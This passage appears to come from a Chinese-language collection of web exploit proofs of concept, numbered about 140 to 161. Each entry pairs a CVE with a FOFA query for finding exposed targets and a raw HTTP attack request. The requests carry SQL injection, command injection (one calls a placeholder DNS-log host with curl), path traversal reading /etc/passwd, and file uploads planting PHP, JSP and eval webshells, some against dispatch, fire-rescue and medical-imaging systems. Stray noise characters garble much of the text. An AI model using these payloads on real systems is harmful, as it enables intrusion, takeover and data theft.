, I. {1 b& n, x- ^- d+ ^GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1 Q5 [6 Q- k$ V1 } y3 ^
Host: x.x.x.x1 Q9 {* ^4 b+ h8 k1 j' }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0# ^' ?4 D2 ]* _+ E+ `7 J d1 J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ Q d( ~6 U$ `1 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" g% z+ w3 y) t6 k8 tAccept-Encoding: gzip, deflate, br9 F0 S4 {$ H% O* L/ e% g
Connection: close& L- n" {7 o, m! y
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
, b* N, n& [0 c& p* K X/ b6 LUpgrade-Insecure-Requests: 1* {4 A% j$ b" L6 k( T) d2 V
/ H& E3 F5 C) d" M% b. |' j
) P9 Y2 h& Z8 U6 ^0 Y5 J
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入5 u% f, Y& Q) S$ j {
CVE-2024-2566
6 ~7 p* I. b8 K2 I; }2 W5 IFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
8 r/ H0 X: X& x' v: g6 o1 f7 S2 hGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.16 Y# U: } m: a( c- [" ~+ K3 ?4 H
Host: x.x.x.x) r, p4 i" [9 Y6 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.05 h( Q9 Y5 Q2 X. t1 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# c- C, ?6 o8 Q5 K% t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. o4 e9 j4 e7 r6 Q4 kAccept-Encoding: gzip, deflate, br; G5 W/ U$ g0 b
Connection: close( S g; U3 {/ j0 W9 |/ t: o
Cookie: authcode=h8g90 U$ g# S0 f7 [& D8 b
Upgrade-Insecure-Requests: 1
! x3 I4 |4 j" H3 w1 Q: I4 s- T4 P7 b" w! {, b
, A9 U) A5 m7 \" @6 N3 t
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入$ |- r N- D6 @% u5 R: X9 [% y
FOFA:body="指挥调度管理平台"
! u8 l: a6 Q( |! aPOST /app/ext/ajax_users.php HTTP/1.1
& J4 u( J6 X9 R B# w* r! DHost: your-ip
/ h0 _$ c6 Z/ `+ k7 i mUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
1 U% ^. B7 i( \ K* m2 \$ WContent-Type: application/x-www-form-urlencoded Q3 `8 `. r/ Q/ u
( `: m. j0 O! P( b* }2 n' C
$ b' f# s+ g! ~2 b
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
, l& d* R9 i# d9 u* l$ u; a
" r) l: \3 e$ V9 {1 ]5 K; y" b
" V$ e' Y0 w- c. x' }/ A142. CMSV6车辆监控平台系统中存在弱密码
" @7 L5 O$ g2 E/ o W6 a' vCVE-2024-29666* T5 T- h! x- }1 g8 q2 S) f% Q. i
FOFA:body="/808gps/"$ Z# g: e8 S& K' R: d* x
admin/admin D3 w' }+ L; g- `3 d. |
143. Netis WF2780 v2.1.40144 远程命令执行9 C( z# Z+ m2 R1 X+ G7 C
CVE-2024-25850
( V; N; ~9 S- m2 bFOFA:title='AP setup' && header='netis'
7 d) B* c% t! B6 ~- e7 I) gPAYLOAD0 F! O/ t8 V" W8 U7 x: W
5 @( o6 c9 }- a/ p& @/ O
144. D-Link nas_sharing.cgi 命令注入
# ^- v- H* c: o) W. qFOFA:app="D_Link-DNS-ShareCenter"
1 D- `! k0 `! W+ T2 ysystem参数用于传要执行的命令
# I! S- F. |. O3 g; b' ?' NGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
6 {# J) r5 o* {$ n6 MHost: x.x.x.x+ v$ g U* b7 i& ~( M
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0- k5 `) [) Y" D# C6 W; W6 e
Connection: close( f% j- N$ x' d3 A
Accept: */*
: @9 {. I5 z1 P/ iAccept-Language: en
0 n. r- y8 l. WAccept-Encoding: gzip
) p+ z0 ? {; A; J( |9 |
* f/ Y) C1 h3 c A: B% n
T. V& Y. j S. H0 Q# o0 I145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
$ u* ?& _- A6 K/ ~. h/ xCVE-2024-3400! V% d; h8 [; Z2 F `; @
FOFA:icon_hash="-631559155"2 J/ V6 ~' r E- O- Z. j
GET /global-protect/login.esp HTTP/1.1" F9 k, }, n* r6 ?
Host: 192.168.30.112:1005
! y* B$ D( l6 T7 k6 n9 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84+ ^9 I% T8 f7 ]& Z
Connection: close* y1 B* @* G! z' s
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
: C; Q$ S& h" ~Accept-Encoding: gzip
7 d* C `* u$ V4 O( l. S9 V: m0 T1 ?% F
" V7 b7 q/ u! R9 r- P146. MajorDoMo thumb.php 未授权远程代码执行3 T3 ?* k. e7 t, Q3 ~+ A
CNVD-2024-02175
6 g7 z+ d% R4 t2 s/ s9 f. p6 JFOFA:app="MajordomoSL"
3 d* ]. a5 a% N' g0 e2 b% dGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1! w/ c1 E/ a0 ^. ~
Host: x.x.x.x
% p' [& [' ?+ Q; ~: t& iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84, R4 ?9 w8 D3 L
Accept-Charset: utf-8
5 v8 q- P. G$ VAccept-Encoding: gzip, deflate0 i1 {1 n0 X+ T n6 W# r
Connection: close
+ p2 b4 m1 ^/ H
9 T# r" N( ^% `/ p3 @& [2 B2 L% Q
* [* y9 t9 X! c4 A" d& I% D147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
9 Z: r$ p2 }! Z# O r4 uCVE-2024-32399 l2 N& w0 b& i$ _8 T" L
FOFA:body="RaidenMAILD"0 P) ~9 ^ z' I3 o2 Q1 s: X" i
GET /webeditor/../../../windows/win.ini HTTP/1.1
& b6 I/ A* g# `4 y; B, i" uHost: 127.0.0.1:81& U% D3 T' S" f
Cache-Control: max-age=0
2 o% Y K% H7 Q0 e. b9 [ u2 lConnection: close
* @% g2 y/ Y' b- m1 V: u7 W! t6 O; v0 C7 G
+ i/ H. X/ c& L: i9 q
148. CrushFTP 认证绕过模板注入
9 }/ s$ _% }7 n8 ?* T1 sCVE-2024-4040
. {5 ?7 c6 S) W! ~FOFA:body="CrushFTP" F! U; R# R* g: O! R
PAYLOAD/ @8 t1 N% a" M0 ]+ _! t2 d
* Q7 O! Q' i2 V7 V; m
149. AJ-Report开源数据大屏存在远程命令执行
% Z, }4 y1 T/ b$ G0 zFOFA:title="AJ-Report") @$ n& g' j! _8 P; m/ x* e
2 C9 c7 U" _' ?- X0 [POST /dataSetParam/verification;swagger-ui/ HTTP/1.13 Q- E& m6 Y6 a9 \
Host: x.x.x.x
) f) L# f7 B% } v5 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 u6 M5 u$ h- ~& z3 ?* ?/ P4 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ {) O7 p" s1 \/ z$ e e) o6 ~$ I( T
Accept-Encoding: gzip, deflate, br
( J" O5 A1 S! E+ t6 c! RAccept-Language: zh-CN,zh;q=0.96 M& S6 c4 f2 B' X
Content-Type: application/json;charset=UTF-8
5 ]1 d: O0 n" N8 C5 L% pConnection: close9 t4 Y" P' u( l. S4 B
7 p) m- r: ^ S6 O" b' {0 L& F
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}# D3 S- F1 o9 S9 _& j
2 Q5 Q% ?. ~9 [' B& P) l& }: K
150. AJ-Report 1.4.0 认证绕过与远程代码执行; @" y1 c6 B' {0 k2 y' Q: Y
FOFA:title="AJ-Report", R% ~' Y3 L( M! I4 m% t! |
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1( {7 R- ~* U* H
Host: x.x.x.x0 G8 i* {( J: a7 n' b0 }/ c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 Z$ {4 W. ^1 V- |3 g& AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- f6 |( S: Q8 {" u6 k, {
Accept-Encoding: gzip, deflate, br
3 I( I/ S1 t0 m y) _ D) |9 U8 GAccept-Language: zh-CN,zh;q=0.9
$ f! b6 l4 e) V+ N( }1 G$ \Content-Type: application/json;charset=UTF-8
; q5 T5 q4 d {$ e- j: R# pConnection: close
5 M( }2 K3 Z: }2 k/ iContent-Length: 339
1 X; m3 C5 a: S1 T/ _" H* N3 B8 O# }: j @& p8 r& S, h
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}$ w$ ?* j r; x8 X' e* {
3 }* L$ s) o6 ^. u3 `7 X7 u/ f6 H/ B8 C2 \0 V R G- K
151. AJ-Report 1.4.1 pageList sql注入
1 ]5 P, X# h6 f. ^. q# \FOFA:title="AJ-Report"; ?( r7 G; o3 P; ~8 E5 T$ R9 N
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
' A% k6 l. W0 z; I* ]3 n! lHost: x.x.x.x
Y1 s9 d0 H1 P3 _* t! |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( ~8 {% n. b6 X- y# `7 a
Connection: close2 z. D, a' N' Y9 L- S8 u, B; d8 M8 I
Accept-Encoding: gzip' N& X& h3 Z# v, F. u0 X. q
s/ ]5 E8 E' A7 b
- ]3 b3 g5 j4 }. R: }3 f152. Progress Kemp LoadMaster 远程命令执行
: P0 [' M$ B: F8 m, c" uCVE-2024-1212
) I( D0 h& K5 XLoadMaster <= 7.2.59.2 (GA)
' C! ^6 l6 f# xLoadMaster<=7.2.54.8 (LTSF)
" e( l9 h' P! v8 g) n# QLoadMaster <= 7.2.48.10 (LTS)2 `- g& s/ `* i4 E0 P. N
FOFA:body="LoadMaster"
9 s1 k4 V) F) ]5 t! P7 V. m1 e! g: VJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
2 z, D: @. l8 k5 q& NGET /access/set?param=enableapi&value=1 HTTP/1.1
0 C$ v* H5 L& H! p1 i5 pHost: x.x.x.x
3 w W& p/ u/ J4 ]+ _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1( h9 b0 X8 O, c0 S
Connection: close
) J: G2 h* H0 ~* l( U( D0 oAccept: */*. L$ k% {* p+ F/ }- }: V; P
Accept-Language: en3 J. {4 Z+ Y0 q' n* O2 m
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=* Z+ g( r: L( U
Accept-Encoding: gzip
7 C9 ?0 n) q+ Q+ s0 @/ `. V7 T
# F4 t, b% F2 g" s/ l; o5 i& Y- {& |4 G- c/ Y
153. gradio任意文件读取. V; A& z. c4 }: { A1 v$ ^. A; F1 H
CVE-2024-1561FOFA:body="__gradio_mode__"& u% `( ` A0 r5 x% s# L) U
第一步,请求/config文件获取componets的id
( q" s5 i: |- j! l5 c: Ihttp://x.x.x.x/config
4 T4 b7 z) K% d0 ?" F
) ~" S9 ~! N/ P0 F0 a, B, ^0 B: D
8 _) p7 w6 f8 g3 p+ P第二步,将/etc/passwd的内容写入到一个临时文件
5 ^; V) r3 _! a8 sPOST /component_server HTTP/1.1
% `2 W! v% i0 X+ {Host: x.x.x.x
& `5 H1 F: q. _* }6 k! sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3; K( ]$ m4 b; s/ U+ [7 S
Connection: close+ \) f8 V; ]0 i1 h4 l. X8 m+ d6 ?) \
Content-Length: 115
) h" k% i+ b6 Q! K! e+ pContent-Type: application/json
) x( S% [& w# T; F+ {% X" BAccept-Encoding: gzip p+ L9 X$ N% R6 H( I
8 a% f. Z! ^9 \. [0 t. W
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}7 g( y' p' R$ g: P; I
2 X6 P4 H1 y: E
! _ q; m& O3 c( o
第三步访问8 A8 D( Q3 J7 P9 j2 S/ d
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
0 X0 Q" K2 x }* h
+ v- Q/ L" {7 _9 D5 Q8 C0 T( D: ~' B% y2 E2 k% E
154. 天维尔消防救援作战调度平台 SQL注入
# X$ g" l A7 O% a2 RCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
t& Y# n0 |2 j' M, R8 a1 YPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
9 K* L/ T, g' FHost: x.x.x.x; ^8 F6 m' d* D
Content-Length: 106
' r3 T- O0 L# K- H5 z+ VCache-Control: max-age=0
2 B! C, f& L# E* ]Upgrade-Insecure-Requests: 1
) i8 h0 D" W4 [/ [6 |Origin: http://x.x.x.x l5 \2 {# m* t: H
Content-Type: application/json' }4 C" Y9 ~8 Q! b; O: |( a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.362 o2 w; m9 f) B4 w" ?: @) T" _/ L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% z. `0 S" F S6 w
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
1 _% z3 M; C- Z z% tAccept-Encoding: gzip, deflate
& Y- f# ]/ \( EAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7( u' @" K# v/ t7 |! F# G9 e
Connection: close
' x+ e1 v, Y* w$ G0 P7 c, p
8 H% n7 d/ q; M( s$ u{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
3 u" ^* T+ O8 Q; v- a; i' k+ [
( x8 [7 g, Y, T" o u5 u) _; o% ^+ y* P1 A9 E* S$ `2 m; I$ q( Y" X6 J
155. 六零导航页 file.php 任意文件上传2 D/ a9 L) V' O, Y% r
CVE-2024-34982
; F# w$ c- x# n* r) ~FOFA:title=="上网导航 - LyLme Spage"
: ~0 d* [: e3 _- n8 C+ JPOST /include/file.php HTTP/1.1
' i; _; I' b4 {2 sHost: x.x.x.x
+ h5 Z4 _( Z4 Q6 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.04 u0 _9 G# |3 F b: b: |, O' Q
Connection: close& E4 w" t) j3 u% ]9 Z
Content-Length: 2322 h* e' w3 t. v O* Z9 e
Accept: application/json, text/javascript, */*; q=0.01
# k# B5 V$ ~! d! R6 _; {9 B/ Q* yAccept-Encoding: gzip, deflate, br
7 g7 w/ u2 w) Y' m3 PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' N4 w( {: R/ L. ]& Q+ O$ kContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
' m8 H3 i& F" dX-Requested-With: XMLHttpRequest
& j0 b0 S+ \" G9 u s/ N
2 u8 w0 a# q4 o# X5 G* ^1 x$ \; I-----------------------------qttl7vemrsold314zg0f# B- _! v3 l* F/ ^# P$ m" w3 o
Content-Disposition: form-data; name="file"; filename="test.php"
! C+ X( y6 [: @- b6 i8 qContent-Type: image/png
w+ d2 h3 ]/ O6 C1 Z6 N
8 ]/ \" [) |3 i2 @) P+ U<?php phpinfo();unlink(__FILE__);?>9 _5 E- I3 I$ A
-----------------------------qttl7vemrsold314zg0f--4 H% t+ p/ W0 c# ^) N
4 C$ ~* y1 V# y- [: V2 C; {
; f1 A, y& Y/ U6 d4 m& ~访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
' P& m2 K, [5 k6 q3 p0 L" Y$ C5 D' d6 g' l, _0 ]4 _. J9 M8 x
156. TBK DVR-4104/DVR-4216 操作系统命令注入
4 U d$ H/ Y. Z/ ]# gCVE-2024-3721
( W8 u4 p( P9 ^7 E4 z0 MFOFA:"Location: /login.rsp"
- L, S6 r' M, [% a6 L# p5 R·TBK DVR-4104# W. p9 L% {6 K/ O. T, @
·TBK DVR-4216- a5 ^- D9 d) L2 q( R, S
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"( S: k: l9 O' {* J5 H2 |
% K. O, k7 P+ H+ ]3 |# Z" S1 k' ?3 g. p4 ~
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1" r1 g1 |# b0 D, X0 \ b% |
Host: x.x.x.x
] @& I g! o; D3 TUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% a6 p( @8 E) i7 S* b: f2 i5 uConnection: close) \- f: _2 s3 ~% @
Content-Length: 0
# q- K) L* f. M6 C: tCookie: uid=15 ]/ V% _, s3 T6 w
Accept-Encoding: gzip' r; c+ n) P- `* K* c; N- d" Y
8 {( x. A+ f! {
& ?, Y2 O7 f+ {! C1 z3 G/ \157. 美特CRM upload.jsp 任意文件上传9 |& A+ M2 \* j' P( B
CNVD-2023-06971
; w9 l( [" O5 gFOFA:body="/common/scripts/basic.js"
+ b0 t8 Z8 |3 I6 b, E lPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1. l( B" p# `( ^
Host: x.x.x.x+ A5 q$ S, H( B# _3 I5 r# X! u+ ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
# a- q* v4 d' o' M7 d% JContent-Length: 709
- N# p4 T8 m) K* g4 t+ p" j% }( XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 [, V1 o% X# @' }& F# gAccept-Encoding: gzip, deflate$ `4 r U) g. a
Accept-Language: zh-CN,zh;q=0.9
' \+ [) W6 ^2 o, b3 oCache-Control: max-age=0
; ~: w) ?6 e0 U6 p& _/ Z' FConnection: close0 |5 i4 l D. J0 E! ^6 L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN9 p! g7 T! ^7 y
Upgrade-Insecure-Requests: 1! l6 [, C% K# W2 ^$ D9 b0 F b
' w' g) Y( a0 K
------WebKitFormBoundary1imovELzPsfzp5dN
" m9 M4 w; `- I6 l" lContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"! Q4 M1 M( b0 d7 ?7 _
Content-Type: application/octet-stream }0 g g3 j% x2 [6 T( Y
7 h/ k c2 L9 W3 G+ Fnyhelxrutzwhrsvsrafb: L8 b$ l+ h9 B% f+ ^! t/ g0 T' l0 O
------WebKitFormBoundary1imovELzPsfzp5dN
' r. B2 }4 Z+ B' }; ]1 h: b: G7 r% t5 vContent-Disposition: form-data; name="key"+ b1 e- u9 Y# ~, h& u6 V5 b
2 ~( `' V3 [8 ?9 x. Y
null* G, {. }6 N& e+ ^1 d1 Q' \* f1 h
------WebKitFormBoundary1imovELzPsfzp5dN
# }3 ^% R6 J$ l j7 K- ]Content-Disposition: form-data; name="form"
5 z5 I: n- y C- d
- K1 |4 r' D4 X: knull
6 C2 F+ l- ?7 G. S/ C8 b7 {------WebKitFormBoundary1imovELzPsfzp5dN9 P( J# o* M) M! x5 ^& u, N
Content-Disposition: form-data; name="field"
" E: r u0 S# y* T N. Z6 _0 j
3 z0 V" R# c/ W9 o$ _* cnull8 z/ H; f0 V4 b. G1 J
------WebKitFormBoundary1imovELzPsfzp5dN+ V9 H. T [; r4 s+ J
Content-Disposition: form-data; name="filetitile"* t1 ]1 r2 z# B" V1 X
' y6 A) e. A- \; C$ }null
' a5 b( H+ @# \% f0 ~------WebKitFormBoundary1imovELzPsfzp5dN! n% H' _% Q2 u) T9 V+ |& R
Content-Disposition: form-data; name="filefolder"$ ]: i3 ~) C0 c+ O( d. z2 N# @
* S$ i' ~- g' }null
. j* N3 l& ~" F------WebKitFormBoundary1imovELzPsfzp5dN--
. C2 R# h# E, p4 M. T/ V/ V. l9 z. v. H
' y2 m- f* w: |! s5 Ohttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
1 ~) _* U/ l6 \% d3 h E0 H: n. @0 @3 t2 v5 C- P
158. Mura-CMS-processAsyncObject存在SQL注入9 N$ @' y/ j7 L. f' a* k0 Q
CVE-2024-32640
5 ^9 u( T4 R5 j7 X2 X- [' ~; {FOFA:"Generator: Masa CMS"
, A; l4 a4 L6 y% `9 L3 n4 d! \POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
: v7 c9 Z5 d' l' x# q, GHost: {{Hostname}}# T5 V2 |$ u4 U( s* h
Content-Type: application/x-www-form-urlencoded
, `; m3 n) L: X; y' Q& U+ }* W
2 G7 V- D( W/ w2 J6 g5 X( u- Sobject=displayregion&contenthistid=x\'&previewid=1, H3 g) R7 W; C1 T, v) [2 b
7 P. W. {6 @1 W u2 V* h
1 e2 s* n9 K" {: l1 [159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
( ~( B* ~- B; GFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
6 X. A2 X+ ?0 W7 CPOST /webservices/WebJobUpload.asmx HTTP/1.1
5 i/ D: t/ r! B1 Q* S5 `: cHost: x.x.x.x6 C( j/ ?* w$ y' n+ D: h' v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
9 ]/ z, ?, b0 d9 _# vContent-Length: 10805 w" Y# A# E% t) U+ P) N+ E
Accept-Encoding: gzip, deflate6 x: Y; `! A+ P$ ~
Connection: close
. u; M/ t. m$ W+ MContent-Type: text/xml; charset=utf-8
2 q/ l6 _: @0 g2 e. tSoapaction: "http://rainier/jobUpload"4 f6 {. N/ C2 E+ B
6 B7 o3 [/ C- P2 I
<?xml version="1.0" encoding="utf-8"?>& P( ^: E, r* c4 O5 B3 P3 k
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' v# G! u: b0 n1 Y
<soap:Body>
( O! S& W, s8 ] a3 n( d( j5 L- J) J<jobUpload xmlns="http://rainier">: z! K) C( h- c4 U9 Q4 T
<vcode>1</vcode>
* c' q! Q' W: m<subFolder></subFolder>: B! K! K Z; ], j
<fileName>abcrce.asmx</fileName>
0 d m p7 @1 H$ Z) a$ ?. F<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
) y, p5 E! z0 |1 H1 x1 Q! G* n: B</jobUpload>5 E! ~' w o: v6 [; b& w: K6 c+ L
</soap:Body>
3 N5 t9 S+ ? D. K! a1 N$ U5 @5 v</soap:Envelope>
/ W% K o2 o8 K/ \8 G1 N$ z# f) Y8 _: V5 v& V! b5 ^' _& d+ [
, o0 w) Y$ T" z' ~0 i$ { ~
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
* ?; o0 B" [3 W$ C, a' Y, B
0 f* W5 p& ^8 |' q
- W. o5 w( q5 Q" l& Y1 ?160. Sonatype Nexus Repository 3目录遍历与文件读取
6 P$ ^7 U3 U) |9 c: ~1 o) ECVE-2024-4956
! v0 c# E$ r1 S |; i! z! BFOFA:title="Nexus Repository Manager"$ ]" Y' l6 G7 S
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1+ m; N. R, R$ _1 x
Host: x.x.x.x
9 V* R+ h" u. t7 _: `/ VUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
( I. H! S8 W3 f& v+ i* d) eConnection: close# p5 f# N) X' \/ P, y5 b7 P& v6 l
Accept: */*
* t6 ~ _2 ^( ^% qAccept-Language: en
7 ?, s- o+ s* d2 A, cAccept-Encoding: gzip
3 a" ?& H: f+ a+ X! O4 F
, n0 L) f! T; T- V- q! j5 b! ?8 l$ K( R7 O
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传: n0 d, H r& }+ T
FOFA:body="/KT_Css/qd_defaul.css"/ g* n8 Z4 o3 f5 X3 A1 h7 U9 g
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密5 W7 ^9 t [3 s! J \
POST /Webservice.asmx HTTP/1.1
- u ~- \" i0 aHost: x.x.x.x4 j! V! e; o6 r, g, i5 m" ^9 A. l; ~. W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.369 B* J3 N0 F0 C& f5 L6 K
Connection: close" Y, \! {, c d7 S% s! O' l* e
Content-Length: 445( M; ?5 a. e# G
Content-Type: text/xml& R8 z: R: J* [$ s( t( l
Accept-Encoding: gzip, j% W% g5 s3 }3 c- F
# l4 s: S* ?1 G! u$ _
<?xml version="1.0" encoding="utf-8"?>2 V9 C4 M6 d3 R
<soap:Envelope xmlns:xsi="
- W2 v4 O; O" W; u7 Nhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
, t& @# Q8 }* ]# {/ Y) I- S7 S8 @xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
